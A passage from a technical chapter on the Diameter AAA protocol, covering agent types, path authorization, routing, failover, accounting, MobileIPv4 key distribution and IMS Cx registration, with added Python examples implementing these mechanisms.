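def sample_acr():
    """Constructed sample: a proxiable ACR carrying a Session-Id and a START record."""
    avps = [encode_avp(AVP_SESSION_ID, b"pdsn.example;1234"),
            encode_avp(AVP_ACCT_RECORD_TYPE, struct.pack("!I", 2))]
    return encode_message(CMD_ACR_ACA, FLAG_R | FLAG_P, 3, 0x1001, 0x2002, avps)
```

The length checks matter in practice: a Diameter node that trusts the 3-octet length fields blindly can be made to read past the buffer or to desynchronize its AVP walk, so a receiver should validate them before interpreting any AVP.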


Figure 6. Diameter agents' operation

(a) Relay agent: the Diameter client in network provider A sends an AAR (1) to the Diameter relay agent, which forwards it (2) to the Diameter server in network provider B; the AAA returns the same way (3, 4). No change is made to any non-routing attributes.

(b) Proxy agent: same flow, but the proxy modifies Diameter messages. Outbound (AAR): add/override Idle-Timeout and Framed-MTU (the values are given in the text). Inbound (AAA): remove Framed-Compression.

(c) Translation agent: the RADIUS client sends an Access-Request (1) to the translation agent, which converts it into a Diameter AAR (2) for the Diameter server; the AAA (3) is converted back into an Access-Accept (4). Inbound (AAA): remove Framed-Compression. Note that a translation agent may modify requests and answers similar to proxy agents.

(d) Redirect agent: the Diameter client sends an AAR (1) to the redirect agent, which answers (2) with an AAA in which the error bit (E) is set in the message header, the result-code AVP = DIAMETER_REDIRECT_INDICATION, Redirect-Host AVP = dest.com, Redirect-Host-Usage AVP = ALL_REALM, and a Redirect-Max-Cache-Time AVP is given. The client then sends the AAR (3) to the Diameter server at dest.com and receives the AAA (4).

Acronyms: AAR: Authentication and Authorization Request; AAA: Authentication and Authorization Answer
and network triggered session abortion. Diameter outlines a policy based framework for end-to-end security5 and establishes auditability and proof of agreement by mandating message path authorization in case a message traverses multiple Diameter agents between two providers. This is accomplished by mandating authentication and authorization for each Diameter node along the path between two Diameter end-nodes. For instance, a service level agreement (SLA) among providers A, B, and C prevents the intermediary provider C from passing A and B's accounting traffic through the untrusted network U. Here, Diameter offers path authorization by requiring that each Diameter agent (provider C in this example) append the identity of the peer the request is received from prior to forwarding it. The Diameter servers must validate the conformance of the route-record attributes with the service policy. Thus, if servers on A or B detect entries for any untrusted servers, an AUTHORIZATION_REJECT error message is sent.

Diameter Applications

So far, we have only presented a summary of the so-called Diameter base protocol, which must be implemented by every Diameter node. One of the most powerful features in Diameter is the introduction of the so-called "Diameter Applications." A node's capability to support certain applications is exchanged upon connection setup in the so-called Diameter capability exchange request and answer (CER, CEA) messages (Calhoun et al., 2003). Note that although many extensions were also added to RADIUS to support different applications (e.g., the Extensible Authentication Protocol [EAP], for WiFi in Rigney, 2000), RADIUS does not include any mechanisms to inform clients whether servers support such extensions. In other words, there is no standardized method to allow clients to discover whether the EAP extension is supported on an arbitrary server. This problem was solved in
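The path authorization rule just described (every agent appends the peer it received the request from; the end server checks the recorded path against its SLA) is mechanical enough to show in code. The following is an added example and not code from the chapter: the provider names and the trusted-peer set are constructed, and the Result-Code values are those RFC 3588 assigns (2001 DIAMETER_SUCCESS, 3005 DIAMETER_LOOP_DETECTED, 5003 DIAMETER_AUTHORIZATION_REJECTED, the code the text refers to as AUTHORIZATION_REJECT). It also covers the routing-loop check that the same Route-Record trail makes possible.

```python
# Result-Code values from RFC 3588, section 7.1.
DIAMETER_SUCCESS = 2001
DIAMETER_LOOP_DETECTED = 3005
DIAMETER_AUTHORIZATION_REJECTED = 5003


def agent_forward(request, received_from, my_host):
    """What a relay or proxy does before forwarding: refuse a message whose
    Route-Record already names this agent (a loop), otherwise append the peer
    the request arrived from. Returns (forwarded_request, result_code)."""
    route = list(request.get("Route-Record", []))
    if my_host in route:
        return None, DIAMETER_LOOP_DETECTED
    forwarded = dict(request)            # never mutate the caller's message
    forwarded["Route-Record"] = route + [received_from]
    return forwarded, DIAMETER_SUCCESS


def authorize_path(request, received_from, trusted_peers):
    """End-server check: every hop recorded in Route-Record, plus the peer the
    server itself received the message from, must be allowed by the SLA policy.
    Returns (result_code, first_offending_hop)."""
    for hop in list(request.get("Route-Record", [])) + [received_from]:
        if hop not in trusted_peers:
            return DIAMETER_AUTHORIZATION_REJECTED, hop
    return DIAMETER_SUCCESS, None


def deliver(request, path, trusted_peers):
    """Carry a request from its Origin-Host through the agents in `path` to the
    server; return (result_code, offending_hop, final Route-Record)."""
    msg, previous = request, request["Origin-Host"]
    for agent in path:
        msg, code = agent_forward(msg, previous, agent)
        if code != DIAMETER_SUCCESS:
            return code, agent, None
        previous = agent
    code, offender = authorize_path(msg, previous, trusted_peers)
    return code, offender, msg["Route-Record"]


# Constructed SLA for the A/B/C example: provider A's server trusts its own NAS,
# provider B's AAA and provider C's relay, but nothing in the untrusted network U.
TRUSTED_BY_PROVIDER_A = {"nas.providerA.com", "aaa.providerB.com", "relay.providerC.com"}
```

Because each hop only ever appends, a server can audit the complete path after the fact, which is the "auditability and proof of agreement" property the text attributes to the mechanism; the check is only as strong as the authentication of each peer identity, which the text says Diameter mandates per hop.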

Diameter by introducing the concept of Diameter applications.

It is important to understand that RFC 3588 defines the minimum prerequisites for a Diameter node implementation and may be used by itself only for accounting. In case of authentication and authorization, a Diameter node must implement a specific application. The most common applications are Diameter NAS (Calhoun, Zorn, Spence, & Mitton, 2005) and MobileIPv4 (Calhoun, Johansson, Perkins, Hiller, & McCann, 2005). The Diameter NAS application defines NAS-related requirements where PPP-based authentication/authorization is needed. The Diameter MobileIPv4 application defines AAA functionality in scenarios where users roam into foreign provider networks. The concept of Diameter applications was employed in many areas, and the following is a summary of three major Diameter applications:

• The Diameter credit control application (Hakala, Mattila, Koskinen, Stura, & Loughney, 2005) is proposed to handle online billing for prepaid solutions. Prepaid billing implies real-time rating for the requested service, user's balance validation, and service suspension once the user's account is exhausted. Debiting and crediting are also supported for some applications such as gaming. Note that Diameter accounting as defined in Calhoun et al. (2003) is mostly suitable for postpaid services where off-line processing of accounting records is performed.
• Diameter EAP (Eronen, Hiller, & Zorn, 2005) is used to support end-to-end authentication in dial-up, 802.1x, 802.11i, and in IPsec IKEv2. It eliminates the possibility of man-in-the-middle attacks if a node is compromised within a proxy chain.
• The Diameter Session Initiation Protocol (SIP) application (Garcia-Martin, Belinchon, Pallares-Lopez, Canales-Valenzuela, & Tammi, 2006) supports HTTP digest authentication (RFC 2617) mandated by SIP (Rosenberg et al., 2002) to allow SIP user agents and proxies to authenticate and authorize users' requests to access certain resources. This application does not depend on the Diameter NAS or MobileIPv4 applications, whereas it supports the Diameter credit control application but does not depend on it. Moreover, Diameter SIP allows locating SIP servers when a SIP agent requests routing information. Finally, it provides a mechanism for pushing updated user profiles to the serving SIP server in case the profile is (administratively) updated.

Finally, it is extremely important to understand that Diameter applications need to be defined only when none of the existing Diameter applications can support the required message flow without major modifications. Such major changes include adding new mandatory AVPs, commands requiring different message flows from any of the currently defined applications, or requiring support for new authentication methods with new AVPs (Fajardo & Ohba, 2006).

Protocol Mechanisms

Diameter Peer Discovery

Diameter offers three primary means to discover Diameter peers: static configuration, Service Location Protocol Version 2 (SLPv2) queries, and the domain name system. A peer table entry is created after peer discovery is executed. Note that peer discovery may be triggered upon the reception of a CER. In some cases, policies may allow establishing connections with unknown peers. In this case, the peer table entry is built from the peer's identity in the CER and expires as soon as the connection is closed. In most cases, peer table entries for known peers are created along with their advertised applications. Thus, only requests for advertised applications are forwarded to these peers.

Diameter Policies

Routing tables provide guidance to the Diameter node on how to process a received request. Figure 7 illustrates an example realm routing table for a relay/proxy agent. Note that a policy includes a realm, an application identifier, and an action. When forwarding is needed, the next hop server is given, together with whether the route entry was statically or dynamically discovered (through a redirect, for example), along with its expiration time. The


Figure 7. Sample routing policy


RealmName=ourrealm.com AND destination=ourid,
ApplicationID=any, Action=LOCAL

RealmName=myMIPdomain.com, ApplicationID=MobileIPv4,
Action=REDIRECT, Next-Hop=ServerMIP.com,
Dynamic:ExpirationTime=900

RealmName=myMIPdomain.com, ApplicationID=DiameterNAS,
Action=PROXY, Next-Hop=ServerACT.com, Static, Proxy_Policy =
{outbound[Idle-Timeout=400],inbound[remove framed-compression]}

DefaultPolicy –Answer result-code=DIAMETER_UNABLE_TO_DELIVER

default policy in case no route is available is to return an error message with the DIAMETER_UNABLE_TO_DELIVER result code.

Diameter Request Routing

Diameter request routing refers to the process needed when originating, sending, and receiving requests. When originating a request, the Diameter node sets the Application-ID, the Origin-Host and Origin-Realm AVPs along with the Destination-Host and/or Destination-Realm. When receiving a message, the node checks the route-record AVP to make sure that there are no routing loops6. It also checks whether it is the ultimate destination of the message. If not, the node acts as an agent and, according to its policy, it relays, proxies, or redirects the message. Each forwarded (i.e., proxied7 or relayed) message is updated with a locally generated hop-by-hop identifier. This field is used to match the requests and answers. Answers are routed opposite to how requests are routed, and using the hop-by-hop identifiers the expected answers at each hop are recognized. Using the hop-by-hop identifier and the saved sender's information, the answer is forwarded back to the previous node with the hop-by-hop identifier restored to its original value. This process ends once a node finds its identity in the origin-host.

Diameter's Failover and Failback Algorithms

Diameter implements the so-called watchdog algorithm to detect communication trouble and initiate the failover mechanism. A Diameter node may have a primary server and multiple secondary servers for redundancy. When a communication problem is detected, a secondary server is promoted to primary and the primary is suspended. Notice that this is important to guarantee consistent failover for all requests.

The link is considered responsive as long as acknowledgements arrive. If the link is idle for "tw" seconds, then a device watchdog request (DWR) is sent. If no device watchdog answer (DWA) arrives within "tw" seconds, the primary is suspended, the secondary server is promoted, and all subsequent communication is sent to the promoted server. Note that outstanding messages may be sent on the failover link, and in this case the "T" flag is set in each message to indicate (to the end server) that such messages may be duplicates. If another "tw" seconds pass without receiving the DWA on the suspended primary link, then the transport connection is closed. The connection may be retried periodically, but for reopened connections a connection validation procedure must be initiated. In this case, three watchdog messages must be answered before failing back to the original primary link (Aboba & Wood, 2003; Calhoun et al., 2003).

A Summary of Diameter's Session Management and Accounting

A session is defined as "a related progression of events devoted to a particular activity" (Fajardo & Ohba, 2006). When a Diameter node is required to keep track of sessions for later use, the node is considered stateful; otherwise it is stateless. For example, in the case where a server needs to
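The watchdog, failover and failback rules above form a small state machine per link, and the value of writing it down is seeing where the "T" flag comes from: it is set on the outstanding requests that get resent over the promoted link. The class below is an added example, not code from the chapter or from any Diameter stack; server names and the "tw" value are constructed, and time is passed in explicitly so the sequence can be replayed deterministically.

```python
class Watchdog:
    """Device-watchdog driven failover and failback for one client with a primary
    and a secondary server, following the algorithm summarised in the text."""

    def __init__(self, primary, secondary, tw, now):
        self.primary, self.secondary, self.tw = primary, secondary, tw
        self.active = primary
        self.state = {primary: "OKAY", secondary: "OKAY"}
        self.last_rx = {primary: now, secondary: now}     # last message seen on each link
        self.dwr_sent = {primary: None, secondary: None}  # time of an unanswered DWR
        self.pending = {}                                 # hop-by-hop id -> outstanding request
        self.reopen_dwa = 0                               # DWAs answered since reopening

    def send_request(self, hop_by_hop, request):
        """Requests go to the active server and stay pending until answered."""
        self.pending[hop_by_hop] = request
        return self.active

    def receive(self, peer, now, kind, hop_by_hop=None):
        """Any message proves the link alive; DWAs also drive the failback count."""
        self.last_rx[peer] = now
        self.dwr_sent[peer] = None
        if kind == "ANSWER":
            self.pending.pop(hop_by_hop, None)
        if self.state[peer] == "SUSPECT":
            self.state[peer] = "OKAY"        # late reply: link usable again, no automatic failback
        if self.state[peer] == "REOPEN" and kind == "DWA":
            self.reopen_dwa += 1
            if self.reopen_dwa >= 3:         # three answered watchdogs before failing back
                self.state[peer] = "OKAY"
                if peer == self.primary:
                    self.active = self.primary
                    return "FAILBACK"
        return None

    def reopen(self, peer, now):
        """Transport reconnected after a close: validate before trusting it again."""
        self.state[peer] = "REOPEN"
        self.reopen_dwa = 0
        self.last_rx[peer] = now
        self.dwr_sent[peer] = None

    def tick(self, now):
        """Advance the timers; returns the actions the client takes at this instant."""
        actions = []
        for peer in (self.primary, self.secondary):
            st, unanswered = self.state[peer], self.dwr_sent[peer]
            if st == "OKAY":
                if unanswered is None and now - self.last_rx[peer] >= self.tw:
                    self.dwr_sent[peer] = now               # idle for tw: probe the link
                    actions.append(("DWR", peer))
                elif unanswered is not None and now - unanswered >= self.tw:
                    self.state[peer] = "SUSPECT"            # no DWA within tw
                    self.dwr_sent[peer] = now               # start the second tw window
                    actions.append(("SUSPEND", peer))
                    if peer == self.active:
                        actions += self._failover()
            elif st == "SUSPECT" and now - unanswered >= self.tw:
                self.state[peer] = "DOWN"                   # second tw without DWA: close transport
                actions.append(("CLOSE", peer))
            elif st == "REOPEN" and unanswered is None:
                self.dwr_sent[peer] = now                   # connection validation probe
                actions.append(("DWR", peer))
        return actions

    def _failover(self):
        """Promote the other server and resend outstanding requests with the T flag set."""
        self.active = self.secondary if self.active == self.primary else self.primary
        actions = [("PROMOTE", self.active)]
        for request in self.pending.values():
            actions.append(("RESEND", self.active, dict(request, T=True)))
        return actions
```

A server receiving a "T"-flagged request cannot tell a retransmission from a genuine second request by the flag alone; it is the stateful accounting server (described further on) that has to recognise the repeat by session and record number.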


trigger re-authentication, it needs to maintain the session state. This implies that session management is application specific. For example, a Diameter accounting server may be configured to keep track of accounting messages such that it is able to eliminate duplicates and fraudulent messages (e.g., a unique Accounting-Start message should not arrive before an Accounting-Stop message for an opened session). In cases where the server is stateful, a Diameter client must always send a session-termination-request (STR) to the server so that the server frees its allocated resources for the session.

RFC 3588 (Calhoun et al., 2003) and RFC 4005 (Calhoun, Zorn, et al., 2005) outline the accounting process. Similar to RADIUS, Diameter accounting requests (ACR) are sent and answers (ACA) are received from servers. A new accounting type, the Event record, has been introduced to be used for short connections where accounting Start and Stop records may arrive during very short time periods (e.g., for push-to-talk services). Accounting Event records are also used to indicate accounting problems. For long connections (e.g., VoIP conferencing and file downloads), Start, Interim, and Stop records are used. It is noteworthy to state that in case of reauthorization, an accounting Interim may be sent to summarize the previous state. In case connection details are modified considerably, an accounting Stop followed by an accounting Start message are sent. The latter case is widely used in practice.

DIAMETER-BASED ARCHITECTURES

As we have seen in the introduction section, there are three network tiers: access, distribution, and core (see Figure 1). In this section, we analyze a selected Diameter application in each tier.

At the Access Layer: 1xEV-DO with a Translation Agent

Figure 1 shows a simplified 1xEV-DO network where radio network controllers (RNCs) authenticate the mobile call through the RADIUS based A12 interface (3GPP2 A.S0008-B, 2006). The AN-AAA returns the subscriber's International Mobile Subscriber Identity (IMSI) in the Callback-ID AVP to the RNC in the RADIUS access-accept message. Note that since the 1xEV-DO standard does not support Diameter yet, operators may utilize Diameter TAs to convert between RADIUS and Diameter queries. The TA may be collocated with the AN-AAA as shown in Figure 1. Note that RNCs may be configured to fail over to another AN-AAA for redundancy. Here, the reader should be aware that such failover is RADIUS based and is not based on the Diameter failover mechanisms.

At the Distribution Layer: Diameter MobileIPv4

The PDSN is considered the first IP gateway in 1xEV-DO networks. In MobileIPv4 architectures, MNs are expected to move from one PDSN region into another, resulting in MobileIP handovers (HO). The HA represents the home network to which the MN's IP address (Home Address) belongs. Here, we assume that the PDSN/FA and the HA natively support the Diameter MobileIPv4 application (i.e., no translation is involved). When the MN moves into a foreign network, it attaches through a FA that tunnels its traffic back to its home agent, enabling it to maintain its IP address while moving (Perkins, 2002; Perkins & Calhoun, 2005).

In 1xEV-DO architectures, the PDSN normally plays the FA role (as well as the NAS role for Diameter) and tunnels the MN's traffic to its HA. The MN establishes a PPP tunnel to the PDSN and broadcasts a registration request (RRQ). Upon receiving the RRQ, the PDSN forwards it towards the AAA for authentication in a Diameter AA-mobile-node-request (AMR) which includes: Session-ID, MN Home Address, Home Agent identity, and MN NAI (Calhoun, Johansson, et al., 2005). Note that such authentication is needed as the RAN may be operated by a different entity from the Internet Service Provider (ISP) who owns the PDSN, HA, and so forth. Thus, upon receiving the Diameter AA-mobile-node-answer (AMA) from the AAA server, the PDSN/FA establishes a MobileIP tunnel with the HA to serve the MN's
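The stateful accounting server described above (Start must not arrive for an already open session, Interim and Stop need an open session, Event records stand alone, and "T"-flagged retransmissions after a failover must not be billed twice) can be expressed as a small session table. This is an added example, not code from the chapter: the Accounting-Record-Type values 1 to 4 and the Result-Codes 2001 and 5002 are those of RFC 3588, while using 5004 (DIAMETER_INVALID_AVP_VALUE) for an out-of-order Start record is this example's own policy choice, since the text does not name a code for that case.

```python
# Accounting-Record-Type values (RFC 3588, section 9.8.1) and Result-Codes (section 7.1).
EVENT_RECORD, START_RECORD, INTERIM_RECORD, STOP_RECORD = 1, 2, 3, 4
DIAMETER_SUCCESS = 2001
DIAMETER_UNKNOWN_SESSION_ID = 5002
DIAMETER_INVALID_AVP_VALUE = 5004   # local policy choice for an out-of-order record


def make_acr(session_id, record_type, record_number, hop_by_hop, retransmitted=False):
    """Constructed ACR with just the AVPs this example needs."""
    return {"Session-Id": session_id, "Accounting-Record-Type": record_type,
            "Accounting-Record-Number": record_number, "Hop-by-Hop": hop_by_hop,
            "T": retransmitted}


class AccountingServer:
    """Stateful accounting server: tracks open sessions so that out-of-order and
    replayed ACRs are recognised instead of being recorded twice."""

    def __init__(self):
        self.open = {}       # Session-Id -> set of record numbers already accepted
        self.log = []        # accepted (Session-Id, record type, record number), in order

    def handle_acr(self, acr):
        sid = acr["Session-Id"]
        rtype = acr["Accounting-Record-Type"]
        number = acr.get("Accounting-Record-Number", 0)
        if rtype == EVENT_RECORD:
            # Short-lived activity (e.g., push-to-talk): one record, no session state kept.
            self.log.append((sid, rtype, number))
            return self._aca(acr, DIAMETER_SUCCESS, "event")
        if rtype == START_RECORD:
            if sid in self.open:
                return self._aca(acr, DIAMETER_INVALID_AVP_VALUE, "start for an open session")
            self.open[sid] = {number}
            self.log.append((sid, rtype, number))
            return self._aca(acr, DIAMETER_SUCCESS, "opened")
        seen = self.open.get(sid)            # INTERIM and STOP need an open session
        if seen is None:
            return self._aca(acr, DIAMETER_UNKNOWN_SESSION_ID, "no open session")
        if number in seen:
            # Retransmission after a failover (T flag) or a genuine replay: acknowledge
            # so the client stops resending, but do not record it a second time.
            reason = "duplicate (retransmitted)" if acr.get("T") else "duplicate"
            return self._aca(acr, DIAMETER_SUCCESS, reason)
        seen.add(number)
        self.log.append((sid, rtype, number))
        if rtype == STOP_RECORD:
            del self.open[sid]               # free the session's resources
            return self._aca(acr, DIAMETER_SUCCESS, "closed")
        return self._aca(acr, DIAMETER_SUCCESS, "interim")

    @staticmethod
    def _aca(acr, code, reason):
        """ACA echoes the identifiers the client uses to match the answer to its request."""
        return {"Session-Id": acr["Session-Id"], "Hop-by-Hop": acr["Hop-by-Hop"],
                "Accounting-Record-Type": acr["Accounting-Record-Type"],
                "Accounting-Record-Number": acr.get("Accounting-Record-Number", 0),
                "Result-Code": code, "reason": reason}
```

Answering a duplicate with success rather than an error is deliberate: the client retransmitted because it never saw an answer, and an error would make it treat a correctly recorded session as failed.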


traffic and starts sending accounting requests to the AAA server.

When a mobile node roams into a foreign network, the foreign network's AAA usually acts as a proxy and forwards the Diameter requests pertaining to the roaming mobile node to its home AAA (HAAA) server. Foreign mobile nodes are simply recognized by the domains in their NAIs. In these cases, the mobile node needs to establish security associations with the HA and/or FA. The HAAA is an attractive element to assist a key distribution mechanism. The Diameter MobileIPv4 application focuses on the role of the AAA as the key distribution element. As shown in Figure 8, the MN-AAA shared secret8 is used to generate the MN-HA and MN-FA secrets. The FA advertises itself and includes a random challenge, and the mobile node replies to the challenge using its MN-AAA shared secret and formulates a registration request (Steps 1, 2). The registration request triggers an AMR at the PDSN to be eventually forwarded to the HAAA (Steps 3, 4). The HAAA validates the request and derives the session keys based on a combination of nonces and the MN-AAA shared secret, then forwards the keys in a home-agent-MIP-request (HAR) to the HA. The HA extracts the MN-HA session key, reformats the nonces generated by the HAAA according to the MobileIP standard, and encapsulates them in the home-agent-MIP-answer (HAA) (Steps 5, 6). The HAAA then creates an AMA which includes the MN-FA session key as well as the reformatted nonces from the HAA and forwards it towards the PDSN. The PDSN eventually extracts the session key and sends a registration reply towards the MN (Steps 7-9). The mobile node derives the session keys using the provided nonces and the MN-AAA shared key. Afterwards, the PDSN generates accounting requests (ACRs) reflecting the user's activity (Steps 10-13). The HAAA may be further used to maintain session information such that the same session-ID is used after handovers (Calhoun, Johansson, et al., 2005).

At the Core: IP Multimedia Subsystem (IMS) Interfaces

In the last few years, convergent networking architectures were widely discussed. The IMS was proposed as a radio access agnostic core infrastructure that allows heterogeneous radio networks (e.g., WiMAX, 1xEV-DO, UMTS, WiFi)

Figure 8. AAA role in MobileIPv4 key distribution

Visited network: mobile node, PDSN (FA), visited Diameter AAA. Home network: home agent (HA), home Diameter AAA with MobileIPv4. A Mobile IP tunnel runs between the PDSN and the HA. Message flow: (1) FA advertisement and challenge; (2) registration request with the MN-AAA response to the FA challenge; (3) AMR (Session-Id = 1234) from the PDSN to the visited AAA; (4) AMR forwarded to the home AAA; (5) HAR to the HA, including the MN-HA key; (6) HAA; (7) AMA, including the MN-FA key, to the visited AAA; (8) AMA to the PDSN; (9) registration reply to the mobile node, including the MN-FA nonce and MN-HA nonce; (10) ACR; (11) ACR forwarded; (12) ACA; (13) ACA.
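The key distribution role of the HAAA in Figure 8 (the MN proves the MN-AAA secret against the FA's challenge; the HAAA derives the MN-HA and MN-FA keys from that secret and fresh nonces, hands the keys to the HA and FA, and the MN recomputes the same keys from the nonces in the registration reply) is shown below as an added example; it is not code from the chapter or from any MobileIP implementation. The derivation used here (HMAC-SHA256 over a label and a nonce under the MN-AAA secret) is this example's own construction, not the key derivation specified for Diameter MobileIPv4, and NAIs, secrets and challenges are constructed. The Result-Code 4001 (DIAMETER_AUTHENTICATION_REJECTED) is from RFC 3588.

```python
import hashlib
import hmac
import os

DIAMETER_SUCCESS = 2001
DIAMETER_AUTHENTICATION_REJECTED = 4001   # RFC 3588 Result-Code


def challenge_response(mn_aaa_secret, nai, challenge):
    """Step 2: the MN's reply to the FA challenge, binding the NAI to the MN-AAA secret.
    HMAC-SHA256 is this example's construction, not the MobileIP authenticator."""
    return hmac.new(mn_aaa_secret, nai + b"|" + challenge, hashlib.sha256).digest()


def derive_key(mn_aaa_secret, label, nonce):
    """Session key for one peer (label b"MN-HA" or b"MN-FA") from the shared secret
    and a nonce; computed by the HAAA and, once the nonce arrives, by the MN."""
    return hmac.new(mn_aaa_secret, label + b"|" + nonce, hashlib.sha256).digest()


class HomeAAA:
    """HAAA: validates the AMR (steps 3-4) and acts as the key distribution element."""

    def __init__(self, subscribers, rng=os.urandom):
        self.subscribers = subscribers   # NAI -> MN-AAA shared secret (constructed table)
        self.rng = rng                   # injectable so the exchange can be replayed in tests

    def handle_amr(self, amr):
        secret = self.subscribers.get(amr["nai"])
        expected = None if secret is None else challenge_response(secret, amr["nai"], amr["challenge"])
        if expected is None or not hmac.compare_digest(amr["response"], expected):
            return {"ama": {"Result-Code": DIAMETER_AUTHENTICATION_REJECTED}, "har": None}
        nonce_ha, nonce_fa = self.rng(16), self.rng(16)
        har = {"Session-Id": amr["Session-Id"],                   # step 5, to the HA
               "mn_ha_key": derive_key(secret, b"MN-HA", nonce_ha), "mn_ha_nonce": nonce_ha}
        ama = {"Session-Id": amr["Session-Id"], "Result-Code": DIAMETER_SUCCESS,  # step 7, to the FA
               "mn_fa_key": derive_key(secret, b"MN-FA", nonce_fa),
               "mn_fa_nonce": nonce_fa, "mn_ha_nonce": nonce_ha}
        return {"ama": ama, "har": har}


def mobile_node_keys(mn_aaa_secret, reg_reply):
    """Step 9 at the MN: rebuild both keys from the nonces in the registration reply.
    The keys themselves never travel to the MN, only the nonces do."""
    return {"mn_ha_key": derive_key(mn_aaa_secret, b"MN-HA", reg_reply["mn_ha_nonce"]),
            "mn_fa_key": derive_key(mn_aaa_secret, b"MN-FA", reg_reply["mn_fa_nonce"])}


def run_registration(nai, mn_secret, haaa, challenge):
    """Steps 1-9 end to end; returns what the HA, the FA and the MN each hold."""
    response = challenge_response(mn_secret, nai, challenge)
    amr = {"Session-Id": "pdsn.visited.example;1234", "nai": nai,
           "challenge": challenge, "response": response}
    out = haaa.handle_amr(amr)
    if out["har"] is None:
        return {"result": out["ama"]["Result-Code"]}
    reg_reply = {"mn_fa_nonce": out["ama"]["mn_fa_nonce"], "mn_ha_nonce": out["ama"]["mn_ha_nonce"]}
    return {"result": DIAMETER_SUCCESS, "ha_key": out["har"]["mn_ha_key"],
            "fa_key": out["ama"]["mn_fa_key"], "mn": mobile_node_keys(mn_secret, reg_reply)}
```

The property worth checking is that the HA and FA end up with exactly the keys the MN computes, while the MN-AAA secret never leaves the MN and the HAAA: the FA, which may belong to a different operator, sees only the challenge, the response and the MN-FA key it is given.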


to communicate. As such, IMS offers unified services and enables seamless connectivity to the application servers (AS). In this section, we outline the role of Diameter in an IMS-based network. In IMS-based architectures users are granted a private identifier (like nai@operatorA.com) and multiple public identifiers (e.g., john.smith@corporate.com, smith_family@home.com), offering users the capability of sharing business and personal contact information, for instance. The users' profiles are stored in the Home Subscriber Server (HSS). Note that the HSS here plays an authentication and authorization role (AA), and this immediately implies the use of Diameter interfaces.

Let us assume that user 1 roams into provider Y's network and wishes to access a game service located in his/her home network. For that, user 1 needs to register with the home network through operator Y's infrastructure. As shown in Figure 9, the first point of entry to the IMS network is the so-called Proxy Call Session Control Function (P-CSCF). The P-CSCF is responsible for SIP message processing and may perform various functions in security, compression, and policy enforcement over the SIP messages. The Interrogating CSCF (I-CSCF) is used to facilitate the communication among different operators. Operators have the I-CSCF addresses listed in their DNS servers to allow their I-CSCF to communicate with the peer I-CSCF in the other operator's network. The I-CSCF normally proxies all SIP messages to the user's Serving CSCF (S-CSCF). The S-CSCF is the element that inspects all of the user's requests and confirms that they abide by the access rights specified for that user. It also acts as a SIP router, where it determines whether the SIP message needs to be sent to one or more ASs before granting service (Camarillo & García-Martín, 2004). Note that CSCFs first communicate over the SIP-based Mw interface and that only I-CSCFs and S-CSCFs communicate with the HSS over the Cx interface (see Table 1 for the Cx Diameter commands). The Cx interface enables the S-CSCF to download users' profiles from the HSS.

Figure 9. Diameter role in IMS network environments

Home network (operator X): HSS1 to HSSn, connected to the AF over the Sh interface (11/Sh) and to the I-CSCF and S-CSCF over the Cx interface (16/Cx); an SLF* reached from the I-CSCF and S-CSCF over the Dx interface; the S-CSCF connected to the AF over ISC (12/ISC); the S-CSCF, AF, and other elements sending accounting to the CCF over Rf; the I-CSCF and S-CSCF connected over Mw. Visited network (operator Y): HA and P-CSCF, with the P-CSCF connected to the home I-CSCF over Mw.

* Note that neither the SLF nor the Dx interface are clearly mentioned in the 3GPP2 IMS standards.

Acronyms: IMS: IP Multimedia Subsystem; AF: Application Function; SLF: Subscription Locator Function; CCF: Charging Collection Function; HSS: Home Subscriber Server; HA: Home Agent; P-CSCF: Proxy-Call/Session Control Function; I-CSCF: Interrogating-Call/Session Control Function; S-CSCF: Serving-Call/Session Control Function

Table 1. The Cx interface commands

Source Destination Command-Name9 Abbreviation


I-CSCF HSS User-Authorization-Request UAR
HSS I-CSCF User-Authorization-Answer UAA
S-CSCF HSS Server-Assignment-Request SAR
HSS S-CSCF Server-Assignment-Answer SAA
I-CSCF HSS Location-Info-Request LIR
HSS I-CSCF Location-Info-Answer LIA
S-CSCF HSS Multimedia-Authentication-Request MAR
HSS S-CSCF Multimedia-Authentication-Answer MAA
HSS S-CSCF Registration-Termination-Request RTR
S-CSCF HSS Registration-Termination-Answer RTA
HSS S-CSCF Push-Profile-Request PPR
S-CSCF HSS Push-Profile-Answer PPA

The Dx interface, shown in Figure 9, is essentially the same as the Cx interface. When an I-CSCF wishes to locate the appropriate HSS that holds the user's profile (in order to contact the right S-CSCF for the user's request), it communicates with the subscription location function (SLF). The SLF is simply a Diameter redirect agent, which refers the I-CSCF to the right HSS. Although this interface is not clearly mentioned in 3GPP2 X.S0013-000-A (2005), it can simply be viewed as a Diameter redirect for a Cx request.

The Sh interface between the HSS and the AS servers facilitates retrieving the application specific user's data, updating it, and receiving notifications when it is changed on the HSS. The S-CSCF and AF may generate accounting records, and in this case such accounting records are sent over the Diameter-based Rf interface towards the charging collection function (CCF). The CCF may reformat the billing records in the charging data record (CDR) format for further processing in the upstream billing system. It is noteworthy to mention that 3GPP2 X.S0013-000-A (2005) includes a 3GPP2 assigned interface name or number for each interface, for example, 16/Cx, along with the original IMS interface names. However, the use of interface numbering seems to be inconsistent in 3GPP2 standards, as in most of the cases the original names only are used (e.g., Cx, not 16/Cx).

In Figure 10, we utilize a subset of the Cx interface commands to illustrate the IMS registration process for a roaming user. Once IP connectivity is established through the MobileIP procedures, the MN, commonly referred to as the user agent (UA) in IMS, initiates a registration request towards the P-CSCF. The P-CSCF recognizes that the user belongs to operator X, performs a DNS lookup for operator X's I-CSCF, and forwards the request to the I-CSCF (Steps 1, 2). When the corresponding I-CSCF receives the registration request, it contacts the HSS over Diameter using the UAR command. Since the REGISTER request usually carries both the user's public and private identities, the HSS validates that a roaming agreement exists with operator Y and that the requestor is a valid user, and returns a UAA to the I-CSCF (Steps 3, 4). The I-CSCF uses the information in the UAA to locate an S-CSCF and forwards the registration request to it (Step 5). Upon receiving the request, the S-CSCF issues a MAR towards the HSS to obtain appropriate authentication vectors to authenticate the user. The S-CSCF formats the response into a SIP response (401 Unauthorized) that carries a challenge (Steps 6, 7). Once the UA receives the response including the challenge (Step 10), it immediately responds with another registration message carrying a response for the


Figure 10. Initial registration with IMS over the Cx interface

Entities: MN (UA), P-CSCF, I-CSCF, HSS, S-CSCF. Message sequence:
1 REGISTER (MN to P-CSCF)
2 REGISTER (P-CSCF to I-CSCF)
3 UAR (I-CSCF to HSS)
4 UAA (HSS to I-CSCF)
5 REGISTER (I-CSCF to S-CSCF)
6 MAR (S-CSCF to HSS)
7 MAA (HSS to S-CSCF)
8 401 Unauthorized / challenge (S-CSCF to I-CSCF)
9 401 Unauthorized / challenge (I-CSCF to P-CSCF)
10 401 Unauthorized / challenge (P-CSCF to MN)
11 REGISTER / response (MN to P-CSCF)
